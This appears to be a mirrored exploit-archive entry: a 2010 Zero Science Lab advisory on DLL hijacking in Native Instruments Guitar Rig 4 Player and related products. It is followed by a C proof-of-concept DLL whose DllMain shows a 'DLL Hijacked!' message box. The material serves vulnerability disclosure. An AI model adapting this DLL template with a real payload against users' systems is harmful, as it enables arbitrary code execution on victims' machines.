72 lines
No EOL
2.3 KiB
C
72 lines
No EOL
2.3 KiB
C
// source: https://www.securityfocus.com/bid/44989/info
|
|
|
|
Multiple products from Native Instruments are prone to multiple vulnerabilities that let attackers execute arbitrary code.
|
|
|
|
An attacker can exploit these issues by enticing a legitimate user to use a vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
|
|
|
|
The issues affect the following:
|
|
|
|
Guitar Rig 4 Player 4.1.1
|
|
KONTAKT 4 PLAYER 4.1.3.4125
|
|
Service Center 2.2.5
|
|
REAKTOR 5 PLAYER 5.5.1.10584
|
|
|
|
/*
|
|
|
|
Native Instruments Guitar Rig 4 Player v4.1.1 Insecure Library Loading Vulnerability
|
|
|
|
|
|
Vendor: Native Instruments GmbH
|
|
Product web page: http://www.native-instruments.com
|
|
Affected version: 4.1.1.1845 (Standalone)
|
|
|
|
Summary: GUITAR RIG 4 PLAYER is the free, modular and expandable effects processor
|
|
from Native Instruments, combining creative effects routing possibilities with
|
|
ease-of-use and pristine sound quality. The included FACTORY SELECTION library
|
|
provides one stunning Amp emulation with Matched Cabinet, plus 20 effects and sound
|
|
modifiers to shape and enhance any audio signal.
|
|
|
|
Desc: Guitar Rig 4 Player suffers from a DLL hijacking vulnerability, which could be
|
|
exploited by remote attackers to compromise a vulnerable system. This issue is
|
|
caused due to the application insecurely loading certain libraries ("libjack.dll")
|
|
from the current working directory, which could allow attackers to execute arbitrary
|
|
code by tricking a user into opening specific related files (.nkm and .nkp) from a
|
|
network share.
|
|
|
|
Tested on: Microsoft Windows XP Professional SP3 (English)
|
|
|
|
Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
|
|
liquidworm gmail com
|
|
|
|
Zero Science Lab - http://www.zeroscience.mk
|
|
|
|
Advisory ID: ZSL-2010-4973
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4973.php
|
|
|
|
06.11.2010
|
|
|
|
*/
|
|
|
|
|
|
#include <windows.h>
|
|
|
|
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
|
|
{
|
|
|
|
switch (fdwReason)
|
|
{
|
|
case DLL_PROCESS_ATTACH:
|
|
dll_mll();
|
|
case DLL_THREAD_ATTACH:
|
|
case DLL_THREAD_DETACH:
|
|
case DLL_PROCESS_DETACH:
|
|
break;
|
|
}
|
|
|
|
return TRUE;
|
|
}
|
|
|
|
int dll_mll()
|
|
{
|
|
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
|
|
} |